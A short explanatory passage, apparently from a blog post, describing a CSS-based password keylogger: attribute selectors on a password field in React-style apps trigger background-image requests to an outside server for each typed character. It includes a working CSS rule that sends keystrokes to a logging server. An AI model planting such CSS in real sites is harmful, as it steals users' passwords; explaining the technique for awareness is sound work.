Turns out it definitely can be, as long as you are using a component-style JavaScript tool (such as React) that updates input values on every keypress. Here’s how it works:

Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

Add some CSS that looks like this:

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

When the user types an a in to the password field, it will hit your server for logging. Dastardly!